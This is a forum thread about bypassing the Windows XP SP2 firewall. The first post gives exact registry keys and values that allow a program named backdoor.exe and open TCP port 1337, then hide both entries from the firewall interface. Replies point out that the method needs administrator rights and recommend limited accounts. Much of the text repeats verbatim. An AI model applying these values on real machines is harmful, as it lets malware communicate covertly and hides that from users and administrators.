- Posts: 181
- Thank you received: 0
Bypassing Windows Firewall, XP SP2 example
19 years 4 months ago #9121
by ping
The greatest pleasure in life is doing what people say you can not do..!!
Bypassing Windows Firewall, XP SP2 example was created by ping
Recently i found this way to by pass the windows SP2 inbuilt firewall. This is for educational purpose strictly. So, here it goes
We can bypass windows firewall using registry.
Just open regedit.exe and go to
[code:1]HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List
[/code:1]
As you can see the sharedaccess service aka windows firewall contains the names of applications allowed for outbound connections.
Tto give access to the desired application we need to add similiar key:
[code:1]C:\\WINDOWS\\system32\\backdoor.exe"="C:\\WINDOWS\\system32\\backdoor.exe:*:Enabled[/code:1]
But then out "backdoor" will be listed in Firewall GUI allowed applications.
Anyway we may hide it by making this
[code:1]C:\\WINDOWS\\system32\\backdoor.exe"="C:\\WINDOWS\\system32\\backdoor.exe:*:Enabled:@xpsp2res.dll,-22019"[/code:1]
We can also open globally any port we want
[code:1]HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List
[/code:1]
by adding similiar value inside this registry key
[code:1]"1337:TCP"="1337:TCP:*:Enabled:Name"[/code:1]
Where "Name" is the name we want to be showed in the GUI
To hide port from listing in the GUI mode we may make something like that
[code:1]1337:TCP:*:Enabled:@xpsp2res.dll,-22003[/code:1]
an then the port will be hidden from listing (XP SP2)..
It works on XP SP2 i didn't tested it on any other os.
This method is used by some malware /spyware manufacturers and together with rootkit it may be reallly dangerous.
We can bypass windows firewall using registry.
Just open regedit.exe and go to
[code:1]HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List
[/code:1]
As you can see the sharedaccess service aka windows firewall contains the names of applications allowed for outbound connections.
Tto give access to the desired application we need to add similiar key:
[code:1]C:\\WINDOWS\\system32\\backdoor.exe"="C:\\WINDOWS\\system32\\backdoor.exe:*:Enabled[/code:1]
But then out "backdoor" will be listed in Firewall GUI allowed applications.
Anyway we may hide it by making this
[code:1]C:\\WINDOWS\\system32\\backdoor.exe"="C:\\WINDOWS\\system32\\backdoor.exe:*:Enabled:@xpsp2res.dll,-22019"[/code:1]
We can also open globally any port we want
[code:1]HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List
[/code:1]
by adding similiar value inside this registry key
[code:1]"1337:TCP"="1337:TCP:*:Enabled:Name"[/code:1]
Where "Name" is the name we want to be showed in the GUI
To hide port from listing in the GUI mode we may make something like that
[code:1]1337:TCP:*:Enabled:@xpsp2res.dll,-22003[/code:1]
an then the port will be hidden from listing (XP SP2)..
It works on XP SP2 i didn't tested it on any other os.
This method is used by some malware /spyware manufacturers and together with rootkit it may be reallly dangerous.
The greatest pleasure in life is doing what people say you can not do..!!
19 years 4 months ago #9126
by nske
Replied by nske on topic Re: Bypassing Windows Firewall, XP SP2 example
Well, of course from an administrator account everything's possible! Firewall's rules had to be stored somewhere after all..
The above would not work in a limited account, since access to the registry is prohibited.
This is nice that you described though, if nothing else to demonstrate how easily can a malware reconfigure the Windows firewall to allow themselves out and how many more considerations there are to take when having logged in as an administrator!
The above would not work in a limited account, since access to the registry is prohibited.
This is nice that you described though, if nothing else to demonstrate how easily can a malware reconfigure the Windows firewall to allow themselves out and how many more considerations there are to take when having logged in as an administrator!
19 years 4 months ago #9128
by DaLight
Replied by DaLight on topic Re: Bypassing Windows Firewall, XP SP2 example
I second nske's comments. I run all my users in non-admin mode at work and at home! This I believe is the major reason behind spyware infections. Obviously this problem mainly exists in the Windows world where people are not so familiar with the concept of root and limited user accounts.
19 years 4 months ago #9131
by nske
Replied by nske on topic Re: Bypassing Windows Firewall, XP SP2 example
Well, since Microsoft likes to push users to the direction it wants in everything (default software, default settings, etc), it would be a good idea to encourage this and some other security-conscious decisions during the installation.
After all, nobody would complain for having to relogin each time he needs to install some new software or configure something, as they complain now for having an unusable malware-infected system -besides, the procedure could be more transparent not requiring to disrupt a current login session.
PS. And afterwards they could even patent this idea and sue the Linux community for billions! :lol:
After all, nobody would complain for having to relogin each time he needs to install some new software or configure something, as they complain now for having an unusable malware-infected system -besides, the procedure could be more transparent not requiring to disrupt a current login session.
PS. And afterwards they could even patent this idea and sue the Linux community for billions! :lol:
Time to create page: 0.129 seconds